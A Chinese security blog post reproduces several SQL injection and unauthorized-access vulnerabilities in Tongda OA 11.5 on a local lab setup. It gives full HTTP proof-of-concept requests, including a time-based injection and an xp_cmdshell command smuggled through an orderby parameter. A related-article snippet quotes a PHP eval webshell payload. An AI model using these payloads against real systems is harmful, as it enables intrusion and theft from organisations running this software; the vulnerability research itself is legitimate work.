2020-08-22通达OA多枚0day漏洞复现

最新推荐文章于 2024-04-28 10:09:33 发布
最新推荐文章于 2024-04-28 10:09:33 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 网络安全 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/108177395
版权

通达OA多枚0day漏洞复现

刚刚群里发了一篇文章-研究复现一波,通达OA多枚0day漏洞poc出来了。

影响范围:通达OA11.5版本

一、环境搭建:

安装11.5版本

安装完成:

服务器配置:

访问IP服务正常:

成功登录系统:

二、漏洞验证复现

漏洞一:SQL注入 POC:

POST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1

问题关键参数:starttime=12&endtime=15&view=month&condition=1

P

OST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1Host: 192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1Content-Length: 152​starttime=12&endtime=15&view=month&condition=1

starttime=AND (SELECT[RANDNUM]FROM(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

详细的注入参数点:

sqlmap验证:

漏洞文件:

webroot\general\appbuilder\modules\calendar\models\Calendar.php。

漏洞二:SQL注入 POC:

GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1

问题关键参数:orderby

GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1Host:192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1

手工注入闭合报错:

burp参数查询,回现报错

sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。

漏洞文件:webroot\inc\utility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入。

漏洞三:SQL注入 POC:

GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total=HTTP/1.1

问题关键参数:orderby

GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total=HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

手工注入闭合报错:

burp参数查询,回现报错

sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。

漏洞文件:webroot\inc\utility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。

漏洞三和漏洞四,参数结果一样可能是这个影响,本地验证未成功。(个人复现情况)

开始看见sql注入2和sql注入3,我以为是是一样的,详细看了还是有差别,功能点参数相似。

漏洞四:SQL注入 POC:

GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1

问题关键参数:id

GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

本地的数据库,相关信息不多

sqlmap验证:

漏洞文件:webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit函数中存在 一个$_GET["id"];  未经过滤,拼接到SQL查询中,造成了SQL注入。

漏洞五:未授权访问:

http://127.0.0.1/general/calendar/arrange/get_cal_list.php?starttime=1595779200&endtime=1599408000&view=agendaDay

本地参数没有成功:可能是本地的环境是刚刚搭建,本地的时间没有相关的数据。

再次确认问题点:未授权访问各种会议通知信息,由于本地的环境是新的没有相关的,没有相关的会议消息,所以不能访问到数据。

参考文章:

安译Sec(https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA)

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

原文链接:https://mp.weixin.qq.com/s/oueVB5ztL1ij4RU-T1fOhw

thelostworld-公众号
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
续集 _ 再发通达OA多枚0day1
08-03
漏洞参数:SORT_ID,FILE_SORT审计版本:通达 OA 11.5看看下图,在我去掉 cookie 之后,发样能注,我测试的 11.5版本存在未授权也
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA query.php SQL注入漏洞
最新发布
Keepb1ue的博客
04-28 496
通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实数字化转型,提高管理效率和竞争力。
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA前台cookie伪造登录漏洞
qq_36584013的博客
04-26 1107
通达OA前台cookie伪造登录漏洞 前言 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修了一个任意用户伪造登录漏洞。 0X01漏洞概述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录,包括admin 漏洞影响版本 通达OA2017 V11.X<V11.5 环境搭建 下载201...
通达OA远程代码执行漏洞通告
爱国小白帽
03-18 2307
通达OA远程代码执行漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发通达OA官方在03月13日发布了针对勒索病毒事件的紧急更新。根据分析该事件是通达OA中存在的两枚漏洞(文件上传漏洞,文件包含漏洞)所导致。 通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务...
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4644
通达OA系统11.2版本为案例的Web渗透
【新】通达OA前台反序列化漏洞分析
C20220511的博客
08-07 1900
通达OA作为历史上出漏洞较多的OA,在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列未做过多测试,本文提到的所有漏洞在最新版的通达12.4中已修,使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验,校验的方法是validateData,其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法,在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。
漏洞系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)
梦之旅行地
08-20 2377
一、影响版本 11.6 二、过程 1.下载11.6版本oa,下载地址:http://www.kxdw.com/soft/23114.html 2.安装 3.exp脚本 import requests target="http://ip:port/" //此处填写上面安装oa的ip及端口 payload="<?php eval($_POST['hahaha']);?>" print("[*]Warning,This exploit code will DELETE auth.i
通达OA任意用户伪造登录漏洞分析与
weixin_45439432的博客
04-23 2380
2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。 补丁对比修改了如下文件: ...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
漏洞-通达TongdaOA系列
aming小老弟
10-03 4186
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台2015年,通达OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑。
通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞
Adminxe的博客
09-22 1501
0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 今天看了好多通达OA的文章,根据护网中出的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本审..
漏洞-通达OA通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2176
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
qq_51577576的博客
03-06 2475
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
某企业通达OA任意登录漏洞
FODKING的博客
11-19 1万+
通达oa的任意登录详解
MinIO未授权SSRF漏洞(CVE-2021-21287)
热门推荐
thelostworld
02-05 1万+
MinIO未授权SSRF漏洞(CVE-2021-21287) 一、漏洞简介 ​ 由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞 攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令 该漏洞无需用户验证即可远程利用 二、影响版本 MinIO < RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞 Docker 安装minio: d...
通达oa网络办公系统漏洞
01-28
通达OA网络办公系统是一种常用的办公自动化系统,它可以帮助企业实信息化办公,提高工作效率。然而,即使是这样一种成熟的系统,也可能存在一些安全漏洞。 首先,通达OA系统可能存在身份认证漏洞,即黑客可以通过某些手段绕过系统的身份验证机制,获取未授权的访问权限。这可能会导致敏感信息的泄露或者系统被非法篡改。 其次,通达OA系统的通信安全也可能存在漏洞,例如没有加密传输机制导致数据在传输过程中容易被窃取或篡改。 此外,系统管理漏洞也是通达OA系统的一个潜在风险,不恰当的系统配置或者权限设置可能导致系统的管理者无法对系统进行有效的监控和管理,从而给黑客留下可乘之机。 针对通达OA系统的这些潜在漏洞,企业可以通过加强系统的安全设置和权限管理来降低风险。同时,定期对系统进行漏洞扫描和安全审计,及时修补系统漏洞,也是确保系统安全的重要手段。另外,公司员工也需要接受专业的安全培训,增强安全意识,避免因为人为操作而导致系统漏洞。综合来看,只有全方位的安全防护措施才能有效地保障通达OA系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值